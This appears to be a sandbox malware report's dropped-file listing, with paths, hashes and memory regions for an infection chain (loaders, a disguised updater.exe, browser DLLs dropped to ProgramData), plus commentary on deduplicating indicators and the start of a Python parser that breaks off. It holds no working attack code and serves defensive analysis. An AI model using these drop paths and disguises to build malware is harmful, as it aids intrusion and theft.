| SHA256 | 2dfef2864a041baf0ee84d71e4c92dc0e793605dece7be16c8d04df81483d9ab |
| SHA512 | 0663d79b7796ae3e7bb88d444297a7af0977164fe88501627326db6dc557ce8da0a07cb203e94cfa7a8ea003669dd492eb6e7ea9218cf0a4f3e4d0b72e36efa9 |
C:\Users\Admin\AppData\Local\Temp\A71.exe
| MD5 | 2e9ae44f23fbf550b7e0dcfe161a1829 |
| SHA1 | b644e07519e7aac42fe4905c2bbeddc6a1c3957d |
| SHA256 | 0bafccb3ca90da20ec6582b16848f7c58f7bc2f7af3b1f15562c88942b906d0d |
| SHA512 | d5b771e262ddd4ec1266f7fcd05a16e755102bf808d22fab24ab402402980faf9ef763316f9d5921393bb5473e18e7750e28a1792dc0d5159bf015874c11f053 |
C:\Users\Admin\AppData\Local\Temp\B9B.exe
| MD5 | d8a10ec2997baf08895cbf482e904c8c |
| SHA1 | 7c58df320d1bc7d4249b6e66016f09ae4139a079 |
| SHA256 | 43cc1575c2949413764525d6298185eb8a39b9216247e7b75724ec2daadf461e |
| SHA512 | 5bde578d0634be516539fe764e2804013e8996fd357c024b5da713d15432c70a763e20909d890614bed592c3815748a450d6be136de05ae92f61ae5f22a61703 |
memory/3168-142-0x00000000009B0000-0x0000000000F35000-memory.dmp
memory/3688-147-0x0000000000400000-0x0000000000425000-memory.dmp
memory/3688-153-0x0000000000400000-0x0000000000425000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\11B6.exe
| MD5 | 275b48a5ff89d48f37a107c26f476b60 |
| SHA1 | b0bf6a4c89c18dbbce6def51832d612dcd0ef848 |
| SHA256 | a5d29ba11247bd34f7e82ea77af0fbc3e184ff96f4804952a1dd553c450588ae |
| SHA512 | 4a21ac8e761beefb1d5b4b55c541487a5b958ef3f5113264fe784e5de5aa1bf45fea0ad51672b1af7f314a2bafa3972c0ce678db0bbabad636f083c1f5cf63fb |
memory/2504-160-0x0000000002490000-0x00000000024C6000-memory.dmp
memory/1884-161-0x0000000002BF0000-0x0000000002BF9000-memory.dmp
memory/3168-174-0x0000000061E00000-0x0000000061EF3000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\26F5.exe
| MD5 | 10ec0c51d73f68a10b00a9425b0c2a4c |
| SHA1 | 3796a9eb91ee0b86ea953370de6b97a036b3b6e9 |
| SHA256 | 6c2c90bb276297dac4caf0b20e38b3a828bac9c98533c36423090cd4fe9a8952 |
| SHA512 | 43976bc013d6414147c2670f36ed6b0b9f7e59a1369264b7bdcb522e71fbd8555677db2b4faba59e1d6e1039c89c757e875ae7af8173518ac9e39bc8d984aad4 |
memory/4948-198-0x0000000000630000-0x0000000000B10000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\2967.exe
| MD5 | cedf70d7565cd364d27ae234cecb3d61 |
| SHA1 | 805c9aebd742fae0473330f8b8a75eea72a5d0dd |
| SHA256 | f1ad1df6a3a99f82aaa83bcb09fbd2bf05dce11bcd1376a1aa5564388b694652 |
| SHA512 | 748e6ad6cba7bf2785feea651e3d7caaa20e51990af7399e82fdcfab4d35f35cc9ecda20ebbbb081a0d2844732cf72fab7e26eeb5f8e75975700426b8432da59 |
\ProgramData\nss3.dll
| MD5 | 1cc453cdf74f31e4d913ff9c10acdde2 |
| SHA1 | 6e85eae544d6e965f15fa5c39700fa7202f3aafe |
| SHA256 | ac5c92fe6c51cfa742e475215b83b3e11a4379820043263bf50d4068686c6fa5 |
| SHA512 | dd9ff4e06b00dc831439bab11c10e9b2ae864ea6e780d3835ea7468818f35439f352ef137da111efcdf2bb6465f6ca486719451bf6cf32c6a4420a56b1d64571 |
\ProgramData\mozglue.dll
| MD5 | c8fd9be83bc728cc04beffafc2907fe9 |
| SHA1 | 95ab9f701e0024cedfbd312bcfe4e726744c4f2e |
| SHA256 | ba06a6ee0b15f5be5c4e67782eec8b521e36c107a329093ec400fe0404eb196a |
| SHA512 | fbb446f4a27ef510e616caad52945d6c9cc1fd063812c41947e579ec2b54df57c6dc46237ded80fca5847f38cbe1747a6c66a13e2c8c19c664a72be35eb8b040 |
C:\Users\Admin\AppData\Local\Temp\2B4C.exe
| MD5 | c64bd985f69900e869f0779da030f22e |
| SHA1 | 8e6dc7909d30c10bd4f0207d483ee2dc167bb99a |
| SHA256 | b4125f4c144720a28eff123eeaa0987d71d87c49342d769e0a5d5c6191bbec18 |
| SHA512 | b79f7c7998bb5beb4027a2a595c5999687237d6127ea8d5af0967e47d77e0b3827badad751aff62e0d646fa1238ddbc69e4471537b48f6107cafe30df7f6dc61 |
memory/3156-228-0x0000000000B00000-0x0000000000B16000-memory.dmp
memory/2504-232-0x0000000000400000-0x0000000000807000-memory.dmp
memory/1884-231-0x0000000000400000-0x0000000002B91000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\ss31.exe
| MD5 | 680261f70d257ae53f013d24256413be |
| SHA1 | 594de5bf6e3d623a51c2cb3d6dcf965d332db489 |
| SHA256 | 5d79cc7f4a364f98939de1e6aebf20c450ed138f8250ce6170b6acbbf102f322 |
| SHA512 | 02cbabcc76b3e24b7bc97fd151a055e9fde44d44bd64eb56c95f44ea4ed26a3caa97c07d20c14ab8eb84009b9a3e615eb3f9fcb9e020edd888f21141d2ac4d52 |
C:\Users\Admin\AppData\Local\Temp\3494.exe
| MD5 | 10ec0c51d73f68a10b00a9425b0c2a4c |
| SHA1 | 3796a9eb91ee0b86ea953370de6b97a036b3b6e9 |
| SHA256 | 6c2c90bb276297dac4caf0b20e38b3a828bac9c98533c36423090cd4fe9a8952 |
| SHA512 | 43976bc013d6414147c2670f36ed6b0b9f7e59a1369264b7bdcb522e71fbd8555677db2b4faba59e1d6e1039c89c757e875ae7af8173518ac9e39bc8d984aad4 |
C:\Users\Admin\AppData\Local\Temp\oldplayer.exe
| MD5 | 0f59853fb3b3a252e267e204024390c2 |
| SHA1 | e692c9d78613e7cac791559f4c8e1f7dd5c74c37 |
| SHA256 | dda2cf88b2ff2f785b1842db4e5c775f2c10b897d6e30905f1150c640f5d79c2 |
| SHA512 | 1bcb63516644524c4fd9fcccfd99849f9913c501e53c3c71e3fb90657f42c1e59cc9c2f9a56f39a3f4029216eed1d11d7228b3e01433203fa71a9b0457f2d31c |
C:\Users\Admin\AppData\Local\Temp\XandETC.exe
| MD5 | 3006b49f3a30a80bb85074c279acc7df |
| SHA1 | 728a7a867d13ad0034c29283939d94f0df6c19df |
| SHA256 | f283b4c0ad4a902e1cb64201742ca4c5118f275e7b911a7dafda1ef01b825280 |
| SHA512 | e8fc5791892d7f08af5a33462a11d39d29b5e86a62cbf135b12e71f2fcaaa48d40d5e3238f64e17a2f126bcfb9d70553a02d30dc60a89f1089b2c1e7465105dd |
memory/4164-253-0x0000000000400000-0x0000000000537000-memory.dmp
memory/4164-257-0x0000000000400000-0x0000000000537000-memory.dmp
memory/4164-260-0x0000000000400000-0x0000000000537000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\10180c8ca3\oneetx.exe
| MD5 | 0f59853fb3b3a252e267e204024390c2 |
| SHA1 | e692c9d78613e7cac791559f4c8e1f7dd5c74c37 |
| SHA256 | dda2cf88b2ff2f785b1842db4e5c775f2c10b897d6e30905f1150c640f5d79c2 |
| SHA512 | 1bcb63516644524c4fd9fcccfd99849f9913c501e53c3c71e3fb90657f42c1e59cc9c2f9a56f39a3f4029216eed1d11d7228b3e01433203fa71a9b0457f2d31c |
memory/4376-258-0x00000000048E0000-0x00000000049FB000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\2B4C.exe
| MD5 | c64bd985f69900e869f0779da030f22e |
| SHA1 | 8e6dc7909d30c10bd4f0207d483ee2dc167bb99a |
| SHA256 | b4125f4c144720a28eff123eeaa0987d71d87c49342d769e0a5d5c6191bbec18 |
| SHA512 | b79f7c7998bb5beb4027a2a595c5999687237d6127ea8d5af0967e47d77e0b3827badad751aff62e0d646fa1238ddbc69e4471537b48f6107cafe30df7f6dc61 |
C:\Users\Admin\AppData\Local\Temp\10180c8ca3\oneetx.exe
| MD5 | 0f59853fb3b3a252e267e204024390c2 |
| SHA1 | e692c9d78613e7cac791559f4c8e1f7dd5c74c37 |
| SHA256 | dda2cf88b2ff2f785b1842db4e5c775f2c10b897d6e30905f1150c640f5d79c2 |
| SHA512 | 1bcb63516644524c4fd9fcccfd99849f9913c501e53c3c71e3fb90657f42c1e59cc9c2f9a56f39a3f4029216eed1d11d7228b3e01433203fa71a9b0457f2d31c |
memory/4164-265-0x0000000000400000-0x0000000000537000-memory.dmp
C:\Users\Admin\AppData\Local\a5948247-5087-4f02-b4b2-8e34b6a1d297\2B4C.exe
| MD5 | c64bd985f69900e869f0779da030f22e |
| SHA1 | 8e6dc7909d30c10bd4f0207d483ee2dc167bb99a |
| SHA256 | b4125f4c144720a28eff123eeaa0987d71d87c49342d769e0a5d5c6191bbec18 |
| SHA512 | b79f7c7998bb5beb4027a2a595c5999687237d6127ea8d5af0967e47d77e0b3827badad751aff62e0d646fa1238ddbc69e4471537b48f6107cafe30df7f6dc61 |
C:\Users\Admin\AppData\Local\Temp\2B4C.exe
| MD5 | c64bd985f69900e869f0779da030f22e |
| SHA1 | 8e6dc7909d30c10bd4f0207d483ee2dc167bb99a |
| SHA256 | b4125f4c144720a28eff123eeaa0987d71d87c49342d769e0a5d5c6191bbec18 |
| SHA512 | b79f7c7998bb5beb4027a2a595c5999687237d6127ea8d5af0967e47d77e0b3827badad751aff62e0d646fa1238ddbc69e4471537b48f6107cafe30df7f6dc61 |
memory/4164-276-0x0000000000400000-0x0000000000537000-memory.dmp
memory/4384-279-0x0000000003000000-0x000000000316E000-memory.dmp
memory/4384-280-0x0000000003170000-0x000000000329F000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\4BE6.exe
| MD5 | 10ec0c51d73f68a10b00a9425b0c2a4c |
| SHA1 | 3796a9eb91ee0b86ea953370de6b97a036b3b6e9 |
| SHA256 | 6c2c90bb276297dac4caf0b20e38b3a828bac9c98533c36423090cd4fe9a8952 |
| SHA512 | 43976bc013d6414147c2670f36ed6b0b9f7e59a1369264b7bdcb522e71fbd8555677db2b4faba59e1d6e1039c89c757e875ae7af8173518ac9e39bc8d984aad4 |
C:\Users\Admin\AppData\Local\Temp\4F90.exe
| MD5 | 4157cd24e2108b88002383f9d4f3dd83 |
| SHA1 | 11a8ab912c936ccad5d4dfd3281bbc24915d0872 |
| SHA256 | c1dda0529a9efe55682507fafeb6898916582b298c661848087379451485cc5c |
| SHA512 | 5581f088b4de893157bcdd49f35207f4c72aefbf538179868605b4e80823b968b97d61803e79fb4fe5b3ac519caeb5aea1f4c5b3dbc8edfcfb294f2a0727fada |
memory/3156-290-0x00000000027F0000-0x0000000002806000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\4F90.exe
| MD5 | 4157cd24e2108b88002383f9d4f3dd83 |
| SHA1 | 11a8ab912c936ccad5d4dfd3281bbc24915d0872 |
| SHA256 | c1dda0529a9efe55682507fafeb6898916582b298c661848087379451485cc5c |
| SHA512 | 5581f088b4de893157bcdd49f35207f4c72aefbf538179868605b4e80823b968b97d61803e79fb4fe5b3ac519caeb5aea1f4c5b3dbc8edfcfb294f2a0727fada |
memory/3360-292-0x0000000000400000-0x0000000002B94000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\54B2.exe
| MD5 | bfd660cf919899286958de601cbc6473 |
| SHA1 | 6952c286d23d7b9a55f841fe29beee4b2c54a662 |
| SHA256 | 3f7c6f6697d36c61f2da442864c3903a452258fdd5872059a3086e885dc8532a |
| SHA512 | d3b09da176ab23ee0d169e95bcb8f785788d8240ac85a23d4f621fc1836d5b28b168fdc68705ca69c1c42bb655059799f1199766810d963047637ef7bd961f78 |
memory/2040-300-0x0000000000400000-0x0000000000537000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\54B2.exe
| MD5 | bfd660cf919899286958de601cbc6473 |
| SHA1 | 6952c286d23d7b9a55f841fe29beee4b2c54a662 |
| SHA256 | 3f7c6f6697d36c61f2da442864c3903a452258fdd5872059a3086e885dc8532a |
| SHA512 | d3b09da176ab23ee0d169e95bcb8f785788d8240ac85a23d4f621fc1836d5b28b168fdc68705ca69c1c42bb655059799f1199766810d963047637ef7bd961f78 |
C:\Users\Admin\AppData\Local\Temp\2B4C.exe
| MD5 | c64bd985f69900e869f0779da030f22e |
| SHA1 | 8e6dc7909d30c10bd4f0207d483ee2dc167bb99a |
| SHA256 | b4125f4c144720a28eff123eeaa0987d71d87c49342d769e0a5d5c6191bbec18 |
| SHA512 | b79f7c7998bb5beb4027a2a595c5999687237d6127ea8d5af0967e47d77e0b3827badad751aff62e0d646fa1238ddbc69e4471537b48f6107cafe30df7f6dc61 |
memory/2040-302-0x0000000000400000-0x0000000000537000-memory.dmp
memory/4172-303-0x00000000002F0000-0x000000000032C000-memory.dmp
memory/4172-304-0x0000000005100000-0x00000000055FE000-memory.dmp
memory/4172-305-0x0000000004F20000-0x0000000004FB2000-memory.dmp
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\B2FAF7692FD9FFBD64EDE317E42334BA_D7393C8F62BDE4D4CB606228BC7A711E
| MD5 | 28e659ef2b72cd9752d93dd42e2ef72e |
| SHA1 | 008b24dbb9945c66f798f13e24805e14f2d13b1b |
| SHA256 | 73f8667c9e52568d7e90e94a7f4984a9457c771dc8a2976ab5903e7b2bc76148 |
| SHA512 | ee4fb41b11a3d05e3711f1da800dc9a0a7966ec69b4ba4d00cc3fb35b79d53a820bfb8243dbced1253e30cc9c4c9b2daf23a5dd1bc34932c2304977e1d09e19e |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\07CEF2F654E3ED6050FFC9B6EB844250_3431D4C539FB2CFCB781821E9902850D
| MD5 | 0a0291b9bdf89c7e506366a8be70a80c |
| SHA1 | a30ddab885654862ba0be0159155bc99945c053f |
| SHA256 | 31631ce5dfb41c09757fbd14367f9e46dc012eed1b8d462e933a34c102441272 |
| SHA512 | b0c29fd46693496d0bd726db2a615049c8cc2996bc38132a57878706a8ee022bbb964b3f9c9bb67e520a82f2144d352655287e015f3617c85fabf72f752e30d5 |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\07CEF2F654E3ED6050FFC9B6EB844250_3431D4C539FB2CFCB781821E9902850D
| MD5 | 959f9ac4acc4843cd011fc3e92f224c4 |
| SHA1 | b1da83a99c02e67fd6a9ac6bd29c5349232bc237 |
| SHA256 | 727e14961fcbf322fc11b4ce5137ca0f9e5eacedf6602e922251a04d3afca3aa |
| SHA512 | 39d666a58b625c7c21481077f198a80c7cf141033808614722faf7868b81c5ded3e0c808523cd86324275e9ab300d512711874cf48a30f2ad3067bbac61d3297 |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\B2FAF7692FD9FFBD64EDE317E42334BA_D7393C8F62BDE4D4CB606228BC7A711E
| MD5 | 89d78eb124083dfc7d87ddbf1acdff7f |
| SHA1 | 069a3b78c24057041ccbd928672113f95523a17d |
| SHA256 | ad777b3e2ac62663252cfcd7495e832f1a043bc3e0e4ecda3abf1c291eedcb0c |
| SHA512 | 34632fe51ac8fb71e52dd7490e01a3e92bbcfa545cd0309d50cb1706f336e09d754b9df04913e6a0f91cbc374cdb365da29c0b29768b56410e82d310b5ba6ebe |
memory/4172-310-0x0000000004F00000-0x0000000004F0A000-memory.dmp
memory/2040-312-0x0000000000400000-0x0000000000537000-memory.dmp
memory/4172-313-0x0000000004990000-0x00000000049A0000-memory.dmp
memory/2040-314-0x0000000000400000-0x0000000000537000-memory.dmp
memory/2040-315-0x0000000000400000-0x0000000000537000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\6126.exe
| MD5 | 27ccd3bda808c4b75390a6c7b7b49348 |
| SHA1 | 4dae1f9f82291109b4c0dae5bed42dee95bf3ba1 |
| SHA256 | 2979f0243412fbd41a2d61e518cdfc8567b7115da9759b01cd69701498067643 |
| SHA512 | 0df221de08c04bebd39df1acc2b1186a377a567c312c34a82074421d2414d349a95c6c4ba3f87c0538c47c9838386e2916e686e8ccf5fab448bdc5013b893d20 |
memory/5116-320-0x00007FF6936C0000-0x00007FF693A7D000-memory.dmp
memory/1740-321-0x0000000002BB0000-0x0000000002BB9000-memory.dmp
memory/4184-322-0x0000000031BC0000-0x0000000031D33000-memory.dmp
memory/2040-326-0x0000000000400000-0x0000000000537000-memory.dmp
memory/2040-328-0x0000000000400000-0x0000000000537000-memory.dmp
memory/2040-329-0x0000000000400000-0x0000000000537000-memory.dmp
memory/4816-332-0x0000000007230000-0x0000000007266000-memory.dmp
memory/4816-333-0x0000000007920000-0x0000000007F48000-memory.dmp
memory/4184-337-0x00000000338D0000-0x0000000033A70000-memory.dmp
memory/4184-338-0x00000000338D0000-0x0000000033A70000-memory.dmp
memory/4816-340-0x00000000078E0000-0x0000000007902000-memory.dmp
memory/4184-339-0x00000000338D0000-0x0000000033A70000-memory.dmp
memory/4804-341-0x0000000000A00000-0x0000000000C29000-memory.dmp
C:\Users\Admin\AppData\Local\11c2e844-349e-431a-a3bc-85ace7a06f39\build2.exe
| MD5 | 770db2929307f3de98c1944fcd4adf92 |
| SHA1 | d84b969b5f77353f734ec251660b71f11f2a76bf |
| SHA256 | 581304c1ecc96f13dc1fcd999afed03ce2844937b63f463269352d9ba60666cb |
| SHA512 | 5bb5ac8146a540ea34aabee20b8f30a3b7fe1064f4cd18f1222aed63eb9a8a946c1e2c45a17b57e0e883ea578aacd255734aeb155451984c44ce1fb90cc66d03 |
memory/4816-353-0x00000000072E0000-0x00000000072F0000-memory.dmp
memory/4816-352-0x00000000081A0000-0x0000000008206000-memory.dmp
memory/4184-347-0x00000000338D0000-0x0000000033A70000-memory.dmp
memory/4816-346-0x0000000007FC0000-0x0000000008026000-memory.dmp
memory/4816-343-0x00000000072E0000-0x00000000072F0000-memory.dmp
memory/4816-354-0x0000000008240000-0x0000000008590000-memory.dmp
memory/4376-359-0x00000000048E0000-0x00000000049FB000-memory.dmp
C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
| MD5 | 9ead10c08e72ae41921191f8db39bc16 |
| SHA1 | abe3bce01cd34afc88e2c838173f8c2bd0090ae1 |
| SHA256 | 8d7f0e6b6877bdfb9f4531afafd0451f7d17f0ac24e2f2427e9b4ecc5452b9f0 |
| SHA512 | aa35dbc59a3589df2763e76a495ce5a9e62196628b4c1d098add38bd7f27c49edf93a66fb8507fb746e37ee32932da2460e440f241abe1a5a279abcc1e5ffe4a |
C:\Users\Admin\AppData\Local\11c2e844-349e-431a-a3bc-85ace7a06f39\build3.exe
| MD5 | 9ead10c08e72ae41921191f8db39bc16 |
| SHA1 | abe3bce01cd34afc88e2c838173f8c2bd0090ae1 |
| SHA256 | 8d7f0e6b6877bdfb9f4531afafd0451f7d17f0ac24e2f2427e9b4ecc5452b9f0 |
| SHA512 | aa35dbc59a3589df2763e76a495ce5a9e62196628b4c1d098add38bd7f27c49edf93a66fb8507fb746e37ee32932da2460e440f241abe1a5a279abcc1e5ffe4a |
memory/4816-375-0x0000000008140000-0x000000000815C000-memory.dmp
memory/4816-376-0x0000000008920000-0x000000000896B000-memory.dmp
memory/2952-381-0x0000000002440000-0x000000000249E000-memory.dmp
memory/4384-383-0x0000000003170000-0x000000000329F000-memory.dmp
memory/5044-384-0x0000000000400000-0x0000000000472000-memory.dmp
memory/4816-385-0x00000000089F0000-0x0000000008A66000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_tjh4nvjq.m35.ps1
| MD5 | c4ca4238a0b923820dcc509a6f75849b |
| SHA1 | 356a192b7913b04c54574d18c28d46e6395428ab |
| SHA256 | 6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b |
| SHA512 | 4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a |
memory/4172-399-0x0000000004990000-0x00000000049A0000-memory.dmp
memory/4816-401-0x000000000A250000-0x000000000A8C8000-memory.dmp
memory/4816-402-0x00000000097E0000-0x00000000097FA000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\10180c8ca3\oneetx.exe
| MD5 | 0f59853fb3b3a252e267e204024390c2 |
| SHA1 | e692c9d78613e7cac791559f4c8e1f7dd5c74c37 |
| SHA256 | dda2cf88b2ff2f785b1842db4e5c775f2c10b897d6e30905f1150c640f5d79c2 |
| SHA512 | 1bcb63516644524c4fd9fcccfd99849f9913c501e53c3c71e3fb90657f42c1e59cc9c2f9a56f39a3f4029216eed1d11d7228b3e01433203fa71a9b0457f2d31c |
memory/2040-404-0x0000000000400000-0x0000000000537000-memory.dmp
memory/4816-405-0x00000000072E0000-0x00000000072F0000-memory.dmp
memory/4816-409-0x0000000009900000-0x00000000099A2000-memory.dmp
memory/4816-412-0x00000000072E0000-0x00000000072F0000-memory.dmp
memory/4816-411-0x00000000072E0000-0x00000000072F0000-memory.dmp
memory/4816-431-0x00000000072E0000-0x00000000072F0000-memory.dmp
memory/2412-435-0x0000000000400000-0x0000000000472000-memory.dmp
memory/1516-437-0x0000000000400000-0x0000000000472000-memory.dmp
memory/812-436-0x0000000000400000-0x0000000000472000-memory.dmp
memory/4816-432-0x00000000072E0000-0x00000000072F0000-memory.dmp
memory/4172-445-0x0000000004990000-0x00000000049A0000-memory.dmp
memory/5044-447-0x0000000000400000-0x0000000000472000-memory.dmp
C:\Users\Admin\AppData\Roaming\eictbfc
| MD5 | 275b48a5ff89d48f37a107c26f476b60 |
| SHA1 | b0bf6a4c89c18dbbce6def51832d612dcd0ef848 |
| SHA256 | a5d29ba11247bd34f7e82ea77af0fbc3e184ff96f4804952a1dd553c450588ae |
| SHA512 | 4a21ac8e761beefb1d5b4b55c541487a5b958ef3f5113264fe784e5de5aa1bf45fea0ad51672b1af7f314a2bafa3972c0ce678db0bbabad636f083c1f5cf63fb |
C:\Users\Admin\AppData\Local\Temp\D415.exe
| MD5 | 3e4f1670b9a96b976bbea891e46fbaee |
| SHA1 | 666dae278b43d797f0c65b72a7189a7bab91dea6 |
| SHA256 | 40150518fbc0f4f3a72ebd482ab2a4c87455ee85abf98e430a475a7ca6e639c4 |
| SHA512 | e11365947efcaa75f05c3d6bb110d0f11ff16dad13e1e53291e26a315d93b948fd2e193384cc24647bab9e972f4c2889c8ecb77a0e62b444e493cda77129ca5a |
memory/812-464-0x0000000000400000-0x0000000000472000-memory.dmp
memory/2412-463-0x0000000000400000-0x0000000000472000-memory.dmp
memory/1516-466-0x0000000000400000-0x0000000000472000-memory.dmp
memory/2924-467-0x000002404BF70000-0x000002404BF80000-memory.dmp
memory/2924-468-0x000002404BF80000-0x000002404BFA2000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | d80f464e895f126a8b3be7637f5550ba |
| SHA1 | 6e1b8ec973c27ac834e76946572c7517d30a706e |
| SHA256 | 44db1d4cd146eefb8aea7799e66c0fc3991bf15c1901543a1d21e70928ef8833 |
| SHA512 | 68eacf64f2edc8091e4f3329d90f2146d30c5a7d2316948afddca22d7c93330f42ec7056d4360ca0160dbd5e5e5decfdfddcb6a5a9561ad2df27938f42d50683 |
memory/2924-472-0x000002404C500000-0x000002404C576000-memory.dmp
memory/2152-473-0x00000000070F0000-0x000000000712C000-memory.dmp
C:\Users\Admin\AppData\Roaming\bdctbfc
| MD5 | 4157cd24e2108b88002383f9d4f3dd83 |
| SHA1 | 11a8ab912c936ccad5d4dfd3281bbc24915d0872 |
| SHA256 | c1dda0529a9efe55682507fafeb6898916582b298c661848087379451485cc5c |
| SHA512 | 5581f088b4de893157bcdd49f35207f4c72aefbf538179868605b4e80823b968b97d61803e79fb4fe5b3ac519caeb5aea1f4c5b3dbc8edfcfb294f2a0727fada |
memory/2152-485-0x0000000007170000-0x00000000071AA000-memory.dmp
memory/2924-520-0x000002404BF70000-0x000002404BF80000-memory.dmp
memory/2152-523-0x0000000004690000-0x00000000046D6000-memory.dmp
memory/2152-526-0x00000000072E0000-0x00000000072F0000-memory.dmp
memory/2152-529-0x00000000072E0000-0x00000000072F0000-memory.dmp
memory/2924-535-0x000002404BF70000-0x000002404BF80000-memory.dmp
memory/2152-532-0x00000000072E0000-0x00000000072F0000-memory.dmp
memory/4172-621-0x0000000004990000-0x00000000049A0000-memory.dmp
memory/1568-623-0x000002404BF70000-0x000002404BF80000-memory.dmp
memory/1568-625-0x0000000002B70000-0x0000000002B7B000-memory.dmp
memory/4872-627-0x0000000002B70000-0x0000000002B7B000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
| MD5 | ad5cd538ca58cb28ede39c108acb5785 |
| SHA1 | 1ae910026f3dbe90ed025e9e96ead2b5399be877 |
| SHA256 | c9e6cb04d6c893458d5a7e12eb575cf97c3172f5e312b1f63a667cbbc5f0c033 |
| SHA512 | c066c5d9b276a68fa636647bb29aea05bfa2292217bc77f5324d9c1d93117772ee8277e1f7cff91ec8d6b7c05ca078f929cecfdbb09582522a9067f54740af13 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 9661122c674f09a89f0b6cbb942e498e |
| SHA1 | 5ee36dacee0fd52696ca7fce8c85c431a79c5837 |
| SHA256 | f843f9104870fcd451b3e4726990fc6b9c16633077a9768b090e0d81e9891cab |
| SHA512 | b870c86d01aae4621e339a3e044ea5fc3a7411fb209eebc65dab8ee454690605b532ac3df126809dbb0648e51737d2548229afe7f9721b9a8686f9d67822c496 |
C:\Users\Admin\AppData\Local\Temp\XandETC.exe
| MD5 | 3006b49f3a30a80bb85074c279acc7df |
| SHA1 | 728a7a867d13ad0034c29283939d94f0df6c19df |
| SHA256 | f283b4c0ad4a902e1cb64201742ca4c5118f275e7b911a7dafda1ef01b825280 |
| SHA512 | e8fc5791892d7f08af5a33462a11d39d29b5e86a62cbf135b12e71f2fcaaa48d40d5e3238f64e17a2f126bcfb9d70553a02d30dc60a89f1089b2c1e7465105dd |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | f801daf957cae7b8d2e711318787281b |
| SHA1 | 13a8635ce2bea075d34da07613a63190182fd07d |
| SHA256 | f6725683d598f2a02b1894225d3d54e37c32cdd9b1ac57d0666ad00504779cb2 |
| SHA512 | 257233b850ed6cae6f7a6df5e0356ad8deb54abf56e8f21337cb02963f6010ba2693d937d36ff40f51c42f8e07ebed0ed8e93649ef7b21a096533e6acdafb7c9 |
C:\Program Files\Notepad\Chrome\updater.exe
| MD5 | 3006b49f3a30a80bb85074c279acc7df |
| SHA1 | 728a7a867d13ad0034c29283939d94f0df6c19df |
| SHA256 | f283b4c0ad4a902e1cb64201742ca4c5118f275e7b911a7dafda1ef01b825280 |
| SHA512 | e8fc5791892d7f08af5a33462a11d39d29b5e86a62cbf135b12e71f2fcaaa48d40d5e3238f64e17a2f126bcfb9d70553a02d30dc60a89f1089b2c1e7465105dd |
C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
| MD5 | 811d351aabd7b708fef7683cf5e29e15 |
| SHA1 | 06fd89e5a575f45d411cf4b3a2d277e642e73dbb |
| SHA256 | 0915139ab02088c3932bcc062ce22d4e9c81aa6df0eacd62900d73d7ad2d3b18 |
| SHA512 | 702d847c2aa3c9526ddf34249de06e58f5e3182d6ef66f77ddbdbbd2e9836026da6eacac2c892cf186d79bdc227a85c14f493b746c03233ef8820d981721c70a |
C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 302a7c179ef577c237c5418fb770fd27 |
| SHA1 | 343ef00d1357a8d2ff6e1143541a8a29435ed30c |
| SHA256 | 9e6b50764916c21c41d6e7c4999bdf27120c069ec7a9268100e1ce5df845149f |
| SHA512 | f2472371a322d0352772defb959ea0a9da0d5ca8f412f6abafac2e6547bcc8a53394a6fb81b488521fc256bfc9f3205d92c6b69d6d139bdb260fb46578946699 |
C:\Program Files\Google\Libs\g.log
| MD5 | fdba80d4081c28c65e32fff246dc46cb |
| SHA1 | 74f809dedd1fc46a3a63ac9904c80f0b817b3686 |
| SHA256 | b9a385645ec2edddbc88b01e6b21362c14e9d7895712e67d375874eb7308e398 |
| SHA512 | b24a6784443c85bb56f8ae401ad4553c0955f587671ec7960bda737901d677d5e15d1a47d3674505fc98ea09ede2e5078a0aeb4481d3728e6715f3eac557cd29 |
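Two things a practitioner should check before turning the dropped-file listing above into indicators. First, several entries are the same payload written to more than one path (build3.exe and mstsca.exe share one SHA256, as do XandETC.exe and the updater.exe dropped under Program Files), so grouping by SHA256 gives the real number of distinct binaries. Second, some entries are operating-system side effects rather than malware output: the __PSScriptPolicyTest_*.ps1 file is written by PowerShell itself to probe script policy and contains only the character "1" (its MD5 c4ca4238a0b923820dcc509a6f75849b and SHA256 6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b are the hashes of that one byte, which the code below verifies with hashlib), and the CryptnetUrlCache, StartupProfileData-NonInteractive and CLR UsageLogs files are CryptoAPI, PowerShell and .NET caches. The following Python script is an added example, not part of the sandbox report: it parses the report's own "path line followed by | MD5 | ... | rows" layout, skips the memory/... dump lines, groups the remaining files by SHA256 and separates OS noise from payloads. The noise path patterns are the author's own heuristic, and the SAMPLE text is a constructed excerpt of a few entries copied from the listing above.

```python
import hashlib
import re
from collections import defaultdict

# Constructed sample: a handful of entries copied from the dropped-file listing
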